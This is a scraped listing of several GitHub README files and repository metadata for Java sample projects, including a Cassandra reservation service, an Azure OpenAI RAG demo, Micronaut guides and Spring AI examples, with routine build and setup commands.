- Option 1: Run Cassandra and the Reservation Service in Docker with the `docker-compose` command.
  - Build the application by running `./mvnw compile`
  - `docker-compose up` if you want to follow the logs, **OR**
  - `docker-compose up -d` to start all containers in detached mode.
- Option 2: Run using Spring Boot against a local Cassandra instance
  - Confirm the default JDK is version 11 or later
  - Download binaries for your platform from http://cassandra.apache.org/download/
  - Unzip the archive, for example `tar xvf apache-cassandra-3.11.6-bin.tar.gz some-directory`
  - Start Cassandra by running `bin/cassandra`
  - Start the Spring Boot app by running `./mvnw spring-boot:run`

## Swagger API

Once the application is running, you can access the Swagger API at `localhost:8080`.

## Running Tests

The test suite for the Reservation Service uses the [Test Containers][testcontainers] project to start a Cassandra node in Docker. You'll want to shut down any infrastructure you created above under [Running the Reservation Service](#runservice).

Run the test suite with the Maven `test` target: `./mvnw test`

## Exercises

This repository is configured with branches that represent the start point and solution for various exercises used in an online course taught periodically with [O'Reilly Live Training][live-training]. These exercises remove some of the application code and require you to add it back in to get the service back to a functional state.

There are exercises to help you learn the various ways of executing statements, such as `SimpleStatement`, `PreparedStatement`, `QueryBuilder` and the Object Mapper. Other exercises teach you how to use batches, lightweight transactions and materialized views.

To work on an exercise, select the branch that represents the start point of the exercise, for example: `git checkout simple-statement`. Then search through the code, complete the `TODO` items, and run the service again until it is working. You can view the solution code for a given exercise in the `_solution` branch, for example `git checkout simple-statement-solution`.

This repository was updated beginning in July 2019 to use the DataStax Java Driver Version 4.x series. Branches beginning with `old_` represent exercises from a prior version of the course and use the 2.x Driver.

## Disclaimers

This service has a couple of shortcomings that would be inappropriate for a production-ready service implementation:

- There is minimal data validation
- There is minimal handling of fault cases
- The schema makes use of Strings as identifiers instead of UUIDs

With respect to that last point about UUIDs: for this service I take the same approach that I did for the book. When working with small scale examples, it is simpler to deal with IDs that are human readable strings. If I were intending to build a real system out of this or even implement more of the "ecosystem" of services implied by the book's data model, I would move toward using UUIDs for identifiers. For more of my thinking on this topic, please read the [Identity blog post][identity] from my [Data Model Meets World][dmmw] series.

## Credits

I found [this tutorial][tutorial] helpful in getting this implementation up and running quickly. Special thanks to [Cedrick Lunven][clun] for his help in modernizing this app. Comments, improvements and feedback are welcome.

Copyright 2017-2020 Jeff Carpenter

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

[tutorial]: http://www.springboottutorial.com/creating-rest-service-with-spring-boot
[schema]: /src/main/resources/reservation.cql
[dmmw]: https://medium.com/@jscarp/data-model-meets-world-c67a46681b39
[identity]: https://medium.com/@jscarp/data-model-meets-world-part-ii-identity-crisis-d517d3d4c39a
[chapter]: https://www.oreilly.com/ideas/cassandra-data-modeling
[driver]: https://docs.datastax.com/en/developer/java-driver/4.1/
[docker-hub]: https://hub.docker.com/_/cassandra
[live-training]: https://www.oreilly.com/live-training/
[clun]: https://github.com/clun
[testcontainers]: https://www.testcontainers.org/
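To make the reservation data model above concrete, here is a minimal sketch of a reservation entity in plain Java. The class and field names are illustrative assumptions loosely based on the book's data model (note the string identifiers rather than UUIDs, per the Disclaimers section); this is not the repository's actual entity code.

```java
import java.time.LocalDate;

// Illustrative sketch only: field names approximate the book's reservation
// data model; this is NOT the repository's actual entity class.
public class ReservationSketch {

    public record Reservation(
            String confirmationNumber, // human-readable string ID, as discussed above
            String hotelId,
            LocalDate startDate,
            LocalDate endDate,
            short roomNumber,
            String guestId) {

        public Reservation {
            if (!endDate.isAfter(startDate)) {
                throw new IllegalArgumentException("end date must be after start date");
            }
        }

        // Number of nights covered by the reservation.
        public long nights() {
            return startDate.datesUntil(endDate).count();
        }
    }

    public static void main(String[] args) {
        Reservation r = new Reservation("RS2G0Z", "NY456",
                LocalDate.of(2020, 6, 8), LocalDate.of(2020, 6, 10), (short) 111, "guest-1");
        System.out.println(r.nights()); // prints 2
    }
}
```

A record is used here for brevity; the real service targets Java 11, where a plain class with final fields would play the same role.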
1
Azure-Samples/azure-search-openai-demo-java
This repo is the Java version of Microsoft's sample app for ChatGPT + Enterprise data.
null
---
page_type: sample
languages:
- azdeveloper
- java
- bicep
- typescript
- html
products:
- azure
- azure-openai
- active-directory
- azure-cognitive-search
- azure-app-service
- azure-container-apps
- azure-kubernetes-service
- azure-sdks
- github
- document-intelligence
- azure-monitor
- azure-pipelines
urlFragment: azure-search-openai-demo-java
name: ChatGPT + Enterprise data (Java) on App Service, Azure Container Apps, and Azure Kubernetes Service
description: A Java sample app that chats with your data using OpenAI and AI Search.
---
<!-- YAML front-matter schema: https://review.learn.microsoft.com/en-us/help/contribute/samples/process/onboarding?branch=main#supported-metadata-fields-for-readmemd -->

# ChatGPT + Enterprise data with Azure OpenAI and Azure AI Search - Java Version

This repo is the Java version of the well known [ChatGPT + Enterprise data code sample](https://github.com/Azure-Samples/azure-search-openai-demo) originally written in Python. It demonstrates best practices for creating ChatGPT-like experiences over your own data using the Retrieval Augmented Generation pattern. It uses Azure OpenAI Service to access the ChatGPT model `gpt-35-turbo`, and Azure AI Search for data indexing and retrieval.

This repository includes sample data so it's ready to try end to end. In this sample application we use a fictitious company called Contoso Electronics, and the experience allows its employees to ask questions about the benefits, internal policies, as well as job descriptions and roles.

What this demo application does:

* Chat and Q&A interfaces
* Explores various options to help users evaluate the trustworthiness of responses with citations, tracking of source content, etc.
* Shows possible approaches for data preparation, prompt construction, and orchestration of interaction between model (ChatGPT) and retriever (Azure AI Search)
* Shows possible AI orchestration implementations using the plain Java OpenAI SDK or the Java Semantic Kernel SDK
* Settings directly in the UX to tweak the behavior and experiment with options

![Chat screen](docs/chatscreen.png)

## Solution Architecture and deployment options

![Microservice RAG Architecture](docs/aks/aks-hla.png)

This sample supports different architectural styles. It can be deployed as a standalone app on top of Azure App Service or as a microservice event-driven architecture with web frontend, AI orchestration and document ingestion apps hosted by Azure Container Apps or Azure Kubernetes Service.

- For **Azure App Service** deployment, see [here](docs/app-service/README-App-Service.md).
- For **Azure Container Apps** deployment, see [here](docs/aca/README-ACA.md).
- For **Azure Kubernetes Service** deployment, see [here](docs/aks/README-AKS.md).

## RAG Implementation Options

This repo is focused on showcasing different options to implement the **"chat with your private documents"** scenario using RAG patterns with Java, Azure OpenAI and Semantic Kernel. Below you can find the list of available implementations.

| Conversational Style | RAG Approach | Description | Java Open AI SDK | Java Semantic Kernel |
|:---------------------|:-------------|:------------|:-----------------|:---------------------|
| One Shot Ask | [PlainJavaAskApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/PlainJavaAskApproach.java) | Uses Azure AI Search and the Java OpenAI APIs. It first retrieves the top documents from search and uses them to build a prompt. Then it uses OpenAI to generate an answer to the user question. Several search retrieval options are available: Text, Vector, Hybrid. When Hybrid or Vector is selected, an additional call to OpenAI is required to generate an embeddings vector for the question. | :white_check_mark: | :x: |
| Chat | [PlainJavaChatApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/chat/approaches/PlainJavaChatApproach.java) | Uses Azure AI Search and the Java OpenAI APIs. It first calls OpenAI to generate a search keyword from the chat history and then to answer the last chat question. Several search retrieval options are available: Text, Vector, Hybrid. When Hybrid or Vector is selected, an additional call to OpenAI is required to generate an embeddings vector for the keywords extracted from the chat. | :white_check_mark: | :x: |
| One Shot Ask | [JavaSemanticKernelWithMemoryApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/JavaSemanticKernelWithMemoryApproach.java) | Uses the Java Semantic Kernel framework with the built-in MemoryStore for embeddings similarity search. A semantic function [RAG.AnswerQuestion](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerQuestion/config.json) is defined to build the prompt using Memory Store vector search results. A customized version of the SK built-in [CognitiveSearchMemoryStore](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/memory/CustomAzureCognitiveSearchMemoryStore.java) is used to map index fields populated by the documents ingestion process. | :x: | This approach is currently disabled within the UI; the memory feature will be available in the next Java Semantic Kernel GA release |
| One Shot Ask | [JavaSemanticKernelChainsApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/JavaSemanticKernelChainsApproach.java) | Uses the Java Semantic Kernel framework with semantic and native functions chaining. It uses an imperative style for AI orchestration through semantic kernel functions chaining. The [InformationFinder.SearchFromQuestion](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/retrieval/semantickernel/CognitiveSearchPlugin.java) native function and the [RAG.AnswerQuestion](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerQuestion/config.json) semantic function are called sequentially. Several search retrieval options are available: Text, Vector, Hybrid. | :x: | :white_check_mark: |
| Chat | [JavaSemanticKernelWithMemoryApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/chat/approaches/semantickernel/JavaSemanticKernelWithMemoryChatApproach.java) | Uses the Java Semantic Kernel framework with the built-in MemoryStore for embeddings similarity search. A semantic function [RAG.AnswerConversation](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerQuestion/config.json) is defined to build the prompt using Memory Store vector search results. A customized version of the SK built-in [CognitiveSearchMemoryStore](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/memory/CustomAzureCognitiveSearchMemoryStore.java) is used to map index fields populated by the documents ingestion process. | :x: | :x: This approach is currently disabled within the UI; the memory feature will be available in the next Java Semantic Kernel GA release |
| Chat | [JavaSemanticKernelChainsApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/chat/approaches/semantickernel/JavaSemanticKernelChainsChatApproach.java) | Uses the Java Semantic Kernel framework with semantic and native functions chaining. It uses an imperative style for AI orchestration through semantic kernel functions chaining. The [InformationFinder.SearchFromConversation](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/retrieval/semantickernel/CognitiveSearchPlugin.java) native function and the [RAG.AnswerConversation](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerConversation/config.json) semantic function are called sequentially. Several search retrieval options are available: Text, Vector, Hybrid. | :x: | :white_check_mark: |
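All the approaches in the table share a retrieve-then-prompt flow: fetch top documents from Azure AI Search, fold them into a prompt, then call the model. Here is a toy sketch of just the prompt-construction step; the class and method names are invented for illustration and are not the sample's actual API.

```java
import java.util.List;

// Toy illustration of the RAG prompt-building step described above:
// retrieved search results become numbered sources the model can cite.
// Names are invented for illustration, not the sample's actual API.
public class RagPromptSketch {

    public static String buildPrompt(String question, List<String> retrievedDocs) {
        StringBuilder sb = new StringBuilder();
        sb.append("Answer the question using only the sources below, citing them as [1], [2], ...\n\nSources:\n");
        for (int i = 0; i < retrievedDocs.size(); i++) {
            sb.append('[').append(i + 1).append("] ").append(retrievedDocs.get(i)).append('\n');
        }
        sb.append("\nQuestion: ").append(question).append("\nAnswer:");
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(buildPrompt(
                "What does the Contoso health plan cover?",
                List.of("Benefit_Options.pdf: The plan covers preventive care...",
                        "PerksPlus.pdf: Employees may claim reimbursement...")));
    }
}
```

The numbered-source layout is what enables the citation tracking mentioned in the feature list: the model's answer can reference `[1]`, `[2]`, which the UI maps back to the source documents.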
1
khannedy/spring-command-pattern
Sample Project for Spring Web Reactive + Reactive Mongo + Command Pattern
command-pattern reactor spring spring-data-mongodb spring-reactive web-reactive
null
1
appiumbook/appiumbook
This repository contains all the sample examples discussed on Appium Book.
null
null
1
zavenco/DigitalImageProcessing
This is the sample application that uses OpenCV library.
null
null
1
SaiUpadhyayula/SpringShoppingStore
This project is a sample eCommerce ShoppingStore application created for learning purposes
null
# SpringShoppingStore

SpringShoppingStore is a sample shopping store which is under development. This project uses Spring MVC, Twitter Bootstrap and JDBC implementations.

I am developing a more advanced shopping store in this repository: https://github.com/SaiUpadhyayula/NgSpringShoppingStore

That app is developed using Spring Boot, MongoDB, Spring Security with JWT, ElasticSearch and Redis.

Features
--------

- Managing the Catalog of Products, Categories and Subcategories
- Shopping Cart
- Wishlist
- Order Management
- Order History
- Customer Management
- Customer Addresses Management
- Payments and Processing (Cash on Delivery)
- Sending emails after customer registration and order placement

Features yet to be added
------------------------

- Product Search
- Discounts on Products
- Admin Console
- Payment Gateway Processing (Credit Cards/Debit Cards)
- Generating Reports of Customer Orders and sending the reports through email to the customer

Cloning the repository
----------------------

To clone this repository use the command

```
$ git clone https://github.com/SaiUpadhyayula/SpringShoppingStore.git
```
1
ozlerhakan/java9-module-examples
a list of Java 9 module samples to dive into the modular world
java java9 java9-jigsaw jigsaw modularity module serviceloader
null
0
micronaut-projects/micronaut-guides
Guides and Tutorials on how to use Micronaut including sample code
groovy java kotlin micronaut tutorials
# Micronaut Guides This is the main repository for the [Micronaut Guides](https://guides.micronaut.io). ## Build the guides To build all the guides run: ```shell $ ./gradlew build ``` This will generate all the projects and guides in `build/dist` and this is what needs to be published to GitHub Pages. To build a single guide, run the dynamic task created by `GuidesPlugin`; convert the kabab case guide directory name to lowerCamelCase and add "Build", e.g. to build `micronaut-http-client`, run ```shell ./gradlew micronautHttpClientBuild ``` ## Create a new guide For a high level overview of the Guides Infrastructure, take a look at this [blog post](https://micronaut.io/2021/04/12/improving-the-micronaut-guides-infrastructure/). All the guides leverage [Micronaut Starter](https://github.com/micronaut-projects/micronaut-starter) core to create the projects. The idea is that one guide can generate up to six different projects, one per language (Java, Groovy and Kotlin) and build tool (Gradle and Maven). ### Guide structure All the guides are in the `guides` directory in separate subdirectories. Inside the directory, the main file is `metadata.json` that describes the guide. All the fields are declared in [GuideMetadata](https://github.com/micronaut-projects/micronaut-guides/blob/master/buildSrc/src/main/groovy/io/micronaut/guides/GuideMetadata.groovy) class. ```json { "title": "Micronaut HTTP Client", "intro": "Learn how to use Micronaut low-level HTTP Client. Simplify your code with the declarative HTTP client.", "authors": ["Sergio del Amo", "Iván López"], "tags": ["client", "rx", "flowable", "json-streams"], "category": "Getting Started", "publicationDate": "2018-07-02", "apps": [ { "name": "default", "features": ["graalvm", "reactor"] } ] } ``` Besides, the obvious fields that doesn't need any further explanation, the other are: - `tags`: List of tags added to the guide. 
You don't need to include the language here because it is added automatically when generating the json file for the Guides webpage. - `category`: Needs to be a valid value from the [Category](https://github.com/micronaut-projects/micronaut-guides/blob/master/buildSrc/src/main/java/io/micronaut/guides/Category.java) enum. - `buildTools`: By default we generate the code in the guides for Gradle and Maven. If a guide is specific only for a build tool, define it here. - `languages`: The guides should be written in the three languages. Sometimes we only write guides in one language or the guide only supports a specific language. - `testFramework`: By default Java and Kotlin applications are tested with JUnit5 and Groovy applications with Spock. In some cases we have Java guides that are tested with Spock. Use this property to configure it. - `skipGradleTests`: Set it to `true` to skip running the tests for the Gradle applications for the guide. This is useful when it's not easy to run tests on CI, for example for some cloud guides. - `skipMavenTests`: Same as `skipGradleTests` but for Maven applications. - `minimumJavaVersion`: If the guide needs a minimum Java version (for example JDK 17 for Records), define it in this property. - `maximumJavaVersion`: If the guide needs a maximum Java version (for example JDK 11 for Azure Functions), define it in this property. - `zipIncludes`: List of additional files to include in the generated zip file for the guide. - `publish`: defaults to true for regular guides; set to false for partial/base guides - `base`: defaults to null; if set, indicates directory name of the base guide to copy before copying the current - `apps`: List of pairs `name`-`features` for the generated application. There are two types of guides, most of the guides only generate one application (single-app). In this case the name of the applications needs to be `default`. 
There are a few guides that generate multiple applications, so they need to be declared here: ```json ... "apps": [ { "name": "bookcatalogue", "features": ["tracing-jaeger", "management"] }, { "name": "bookinventory", "features": ["tracing-jaeger", "management"] }, { "name": "bookrecommendation", "features": ["tracing-jaeger", "management", "reactor"] } ] ``` The features need to be **valid** features from Starter because the list is used directly when generating the applications using Starter infrastructure. If you need a feature that is not available on Starter, create it in `buildSrc/src/main/java/io/micronaut/guides/feature`. Also declare the GAV coordinates and version in `buildSrc/src/main/resources/pom.xml`. Dependabot is configured in this project to look for that file and send pull requests to update the dependencies. Inside the specific guide directory there should be a directory per language with the appropriate directory structure. All these files will be copied into the final guide directory after the guide is generated. ```shell micronaut-http-client ├── groovy │ └── src │ ├── main │ │ └── groovy │ │ └── example │ │ └── micronaut │ └── test │ └── groovy │ └── example │ └── micronaut ├── java │ └── src │ ├── main │ │ └── java │ │ └── example │ │ └── micronaut │ └── test │ └── java │ └── example │ └── micronaut ├── kotlin │ └── src │ ├── main │ │ └── kotlin │ │ └── example │ │ └── micronaut │ └── test │ └── kotlin │ └── example │ └── micronaut └── src └── main └── resources ``` For multi-applications guides there needs to be an additional directory with the name of the application declared in `metadata.json` file: ```shell micronaut-microservices-distributed-tracing-zipkin ├── bookcatalogue │ ├── groovy │ │ ... │ ├── java │ │ ... │ └── kotlin │ ... ├── bookinventory │ ├── groovy │ │ ... │ ├── java │ │ ... │ └── kotlin │ ... └── bookrecommendation ├── groovy │ ... ├── java │ ... 
└── kotlin ``` ### Writing the guide There is only one Asciidoctor file per guide in the root directory of the guide (sibling to `metadata.json`). This unique file is used to generate all the combinations for the guide (language and build tool) so we need to take that into account when writing the guide. Name the Asciidoctor file the same as the directory, with an "adoc" extension, e.g. `micronaut-http-client.adoc` for the `micronaut-http-client` guide directory. We don't really write a valid Asciidoctor file but our "own" Asciidoctor with custom kind-of-macros. Then during the build process we render the final HTML for the guide in two phases. In the first one we evaluate all of our custom macros and include and generate a new language-build tool version of the guide in `src/doc/asciidoc`. This directory is excluded from source control and needs to be considered temporary. Then we render the final HTML of the (up to) six guides from that generated and valid Asciidoctor file. #### Placeholders You can use the following placeholders while writing a guide: * `@language@` * `@guideTitle@` * `@guideIntro@` * `@micronaut@` * `@lang@` * `@build@` * `@testFramework@` * `@authors@` * `@languageextension@` * `@testsuffix@` * `@sourceDir@` * `@minJdk@` * `@api@` * `@features@` * `@features-words@` #### Common snippets We have small pieces of text that are used in different guides. To avoid the duplication we have common snippets in the `src/docs/common` directory. For example the file `common-header-top.adoc`: ```asciidoc = @guideTitle@ @guideIntro@ Authors: @authors@ Micronaut Version: @micronaut@ ``` Will render the title, description, authors and version of all the guides. The variables defined between `@` signs will be evaluated and replaced during the first stage of the asciidoctor render. 
For example, for the Micronaut HTTP Client guide, the previous common snippet will generate: ```asciidoc // Start: common-header-top.adoc = Micronaut HTTP Client Learn how to use Micronaut low-level HTTP Client. Simplify your code with the declarative HTTP client. Authors: Sergio del Amo, Iván López Micronaut Version: 3.2.7 // End: common-header-top.adoc ``` #### Custom macros There are a number of custom macros available to make it easy writing a single asciidoctor file for all the guides and include the necessary source files, resources,... This is really important because when we include a source code snippet the base directory will change for every language the guide is written. The following snippet from the HTTP Client guide: ```asciidoc source:GithubConfiguration[] ``` Will generate the following Asciidoctor depending on the language of the guide: - Java: ```asciidoc [source,java] .src/main/java/example/micronaut/GithubConfiguration.java ---- include::{sourceDir}/micronaut-http-client-gradle-java/src/main/java/example/micronaut/GithubConfiguration.java[] ---- ``` - Groovy: ```asciidoc [source,groovy] .src/main/groovy/example/micronaut/GithubConfiguration.groovy ---- include::{sourceDir}/micronaut-http-client-gradle-groovy/src/main/groovy/example/micronaut/GithubConfiguration.groovy[] ---- ``` - Kotlin: ```asciidoc [source,kotlin] .src/main/kotlin/example/micronaut/GithubConfiguration.kt ---- include::{sourceDir}/micronaut-http-client-gradle-kotlin/src/main/kotlin/example/micronaut/GithubConfiguration.kt[] ---- ``` As you can see, the macro takes care of the directories (`src/main/java` vs `src/main/groovy` vs `src/main/kotlin`) and the file extension. Following this same approach there are macros like: - `source`: Already explained. - `resource`: To include a file from the `src/main/resources` directory. - `test`: To include a file from the `src/main/test` directory. This macro also takes care of the suffix depending on the test framework. 
For example, with `test:GithubControllerTest[]` the macro will reference the file `GithubControllerTest.java` (or .kt) for Java and Kotlin and `GithubControllerSpec.groovy` for Groovy. - `testResource`: To include a file from the `src/main/test/resources` directory. - `callout`: To include a common callout snippet. In all the cases it is possible to pass additional parameters to the macros to customise them. For example, to extract a custom tag from a snippet, we can do `resource:application.yml[tag=githubconfig]`. Look for usages of those macros in the `guides` directory to find more examples. #### Special custom blocks There are also special custom blocks to exclude some code to be included in the generated guide based on some condition. This is useful when explaining something specific of the build tool (like how to run the tests with Gradle or Maven) or to exclude something depending on the language (for example do not render the GraalVM section in Groovy guides, as Groovy is not compatible with GraalVM). Example: ```asciidoc :exclude-for-languages:kotlin <2> The Micronaut framework will not load the bean unless configuration properties are set. :exclude-for-languages: :exclude-for-languages:java,groovy <2> Kotlin doesn't support runtime repeatable annotations (see https://youtrack.jetbrains.com/issue/KT-12794[KT-12794]. We use a custom condition to enable the bean where appropriate. :exclude-for-languages: ``` For Java and Groovy guides the first block will be included. For Kotlin guide, the second block will be included. Example for build tool: ```asciidoc :exclude-for-build:maven Now start the application. Execute the `./gradlew run` command, which will start the application on port 8080. :exclude-for-build: :exclude-for-build:gradle Now start the application. Execute the `./mvnw mn:run` command, which will start the application on port 8080. :exclude-for-build: ``` For a Gradle guide, the first block will be included. 
For a Maven guide, the second one will be included. As before, look for usages of the macro in the `guides` directory for more examples. ### New Guide Template To create a new guide use the following template as the base asciidoc file: ```asciidoc common:header.adoc[] common:requirements.adoc[] common:completesolution.adoc[] common:create-app.adoc[] TODO: Describe the user step by step how to write the app. Use includes to reference real code: Example of a Controller source:HelloController[] Example of a Test test:HelloControllerTest[] common:testApp.adoc[] common:runapp.adoc[] common:graal-with-plugins.adoc[] :exclude-for-languages:groovy TODO describe how you consume the endpoints exposed by the native executable with curl :exclude-for-languages: TODO Use the generic next step common:next.adoc[] TODO or a personalised guide for the guide: == Next steps TODO: link to the documentation modules you used in the guide ``` ### Testing the guide When working on a new guide, generate it as explained before. The guide will be available in the `build/dist` directory and the applications will be in the `build/code` directory. You can open any directory in `build/code` directly in your IDE to make any changes but keep in mind copying the code back to the appropriate directory. In the `build/code` directory a file `test.sh` is created to run all the tests for the guides generated. Run it locally to make sure it passes before submitting a new pull request. You can run this test with a gradle task ```bash ./gradlew :____RunTestScript ``` where `____` is the camel-case name of your guide. eg: ```bash ./gradlew micronautFlywayRunTestScript ``` to run all the tests for the `micronaut-flyway` guide. ## Upgrade Micronaut version When a new Micronaut version is released, update the [version.txt](https://github.com/micronaut-projects/micronaut-guides/blob/master/version.txt) file in the root directory. Submit a new pull request and if the build passes, merge it. 
A few minutes later all the guides will be upgraded to the new version. ## Deployment Guides are published to [gh-pages](https://pages.github.com) following the same branch structure as Micronaut Core: - One directory per Micronaut minor version: `3.0.x`, `3.1.x`, `3.2.x`,... - One directory with the latest version of the guide: `latest` ## GitHub Actions There are two main jobs: - Java CI: Runs every time a pull request is opened or something is merged into `master`. The `test.sh` script explained before is executed. - Java CI SNAPSHOT: A cron job runs the tests daily against the new Micronaut patch and minor versions to make sure everything will work when we release new versions in the future.
1
aalmiray/sb-cli
Sample Spring Boot CLI application
null
null
1
googleapis/discovery-artifact-manager
The Discovery Artifact Manager is intended to facilitate testing, publishing, and synchronization of generators and artifacts for client libraries and generated code samples of Google APIs defined by the API Discovery Service.
null
# Introduction The Discovery Artifact Manager is intended to facilitate testing, publishing, and synchronization of generators and artifacts for client libraries and generated code samples of Google APIs defined by the API Discovery Service. This repo includes copies of the following in separate top-level directories: - Discovery files from the [API Discovery Service](https://developers.google.com/discovery/) - the Google API client library generator (used to generate Java and PHP client libraries) - some of the [Discovery-based Google API client libraries](https://developers.google.com/discovery/libraries), along with their generators - the code generation [toolkit](https://github.com/googleapis/toolkit/) used to generate code samples for client libraries. **NOTE**: This repo only contains a cache of the above items; it is not their source of truth. Changes to Toolkit and Discovery-based Google API client libraries should be directed to their respective repos. There is no guarantee that sources or Discovery files in this repo are up to date. ## Local machine setup Install [git-subrepo](https://github.com/ingydotnet/git-subrepo) on your local machine. ## Adding a new client library repo Use the `git subrepo clone` command, from the root directory of this repository. The NodeJS library, for example, is installed using: ``` shell git subrepo clone https://github.com/google/google-api-nodejs-client.git clients/nodejs/google-api-nodejs-client ``` ## Modifying a client library repo To make changes to a repo, use the `git subrepo pull` and `git subrepo push` commands. The former will merge your local client with fetched upstream changes, and the latter will actually do the push to the upstream sub-repo. 
For example, to push the PHP client library: ``` shell git subrepo pull clients/php/google-api-php-client-services git subrepo push clients/php/google-api-php-client-services ``` During the course of your local work, you may find yourself deciding to reset your HEAD locally. If you do this after a subrepo push, resetting your HEAD to before the push, it can cause some complications: you would not want `git subrepo` to subsequently pull again, as it normally does when pushing (since that will merge the upstream changes you pushed earlier). Instead, you can force-push your changes by using `git subrepo push --force`. We're still learning the quirks of `git subrepo`, but a good rule of thumb is to be extremely careful when manipulating references that have already been synced (push or pull) with the external subrepo locations. After you push your subrepo, you should also push `discovery-artifact-manager` to your review branch. ## Pushing changes for review When you make a change to code that lives in `discovery-artifact-manager`, either directly or via subrepos, you should stage your code to your own Github review branch and then create a Pull Request from there to the Github `master` branch. 1. Create a review branch on Github. We'll refer to the name of the branch as `${REVIEW_BRANCH}`. 1. Decide what local branch you'll push. Often, this will be `master`. We'll refer to this branch as `${LOCAL_BRANCH}`. 1. From your local machine, push to the review branch: ``` git push origin ${LOCAL_BRANCH}:${REVIEW_BRANCH} ``` 1. On Github, issue a Pull Request against the `master` branch. ## Updating local Discovery doc cache To aid hermetic testing of client libraries and samples (avoiding synchronization issues), the `discoveries` directory hosts a local cache of Discovery docs from the Discovery service. This cache may be updated from current live versions by running ``` shell ./src/main/updatedisco/updatedisco ``` from any subdirectory.
**This cache is not yet used for testing by other tools.** ## Running tests ```bash cd toolkit ./gradlew test ``` ## Updating samples To update samples, you will need to both edit the appropriate `.snip` file, e.g., `toolkit/src/main/resources/com/google/api/codegen/nodejs/sample.snip`, and update the tests. ### Updating tests * `cd toolkit`. * run `./gradlew test`; this will generate the expected test output in `/tmp/com.google.api.codegen_testdata/`. * copy the snapshot files generated in `/tmp` to the appropriate location, in the case of this example: `src/test/java/com/google/api/codegen/testdata/discoveries/nodejs/`. * make sure that the samples look appropriate. * and _finally_, re-run tests.
0
ThomasVitale/llm-apps-java-spring-ai
Samples showing how to build Java applications powered by Generative AI and LLMs using Spring AI.
embeddings generative-ai large-language-models llm ollama openai rag spring-ai
# LLM Applications with Java and Spring AI Samples showing how to build Java applications powered by Generative AI and LLMs using [Spring AI](https://docs.spring.io/spring-ai/reference/). ## Pre-Requisites * Java 21 * Docker/Podman * [OpenAI](http://platform.openai.com) API Key (optional) * [Ollama](https://ollama.ai) (optional) ## Content ### 0. Use Cases _Coming soon_ ### 1. Chat Models | Project | Description | |---------------------------------------------------------------------------------------------------------------------------|---------------------------------------| | [chat-models-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/01-chat-models/chat-models-ollama) | Text generation with LLMs via Ollama. | | [chat-models-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/01-chat-models/chat-models-openai) | Text generation with LLMs via OpenAI. | ### 2. Prompts | Project | Description | |------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------| | [prompts-basics-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-basics-ollama) | Prompting using simple text with LLMs via Ollama. | | [prompts-basics-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-basics-openai) | Prompting using simple text with LLMs via OpenAI. | | [prompts-messages-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-messages-ollama) | Prompting using structured messages and roles with LLMs via Ollama. | | [prompts-messages-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-messages-openai) | Prompting using structured messages and roles with LLMs via OpenAI. 
| | [prompts-templates-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-templates-ollama) | Prompting using templates with LLMs via Ollama. | | [prompts-templates-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-templates-openai) | Prompting using templates with LLMs via OpenAI. | ### 3. Output Parsers | Project | Description | |------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------| | [output-parsers-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/03-output-parsers/output-parsers-ollama) | Parsing the LLM output as structured objects (Beans, Map, List) via Ollama. | | [output-parsers-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/03-output-parsers/output-parsers-openai) | Parsing the LLM output as structured objects (Beans, Map, List) via Open AI. | ### 4. Embedding Models | Project | Description | |------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------| | [embedding-models-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/04-embedding-models/embedding-models-ollama) | Vector transformation (embeddings) with LLMs via Ollama. | | 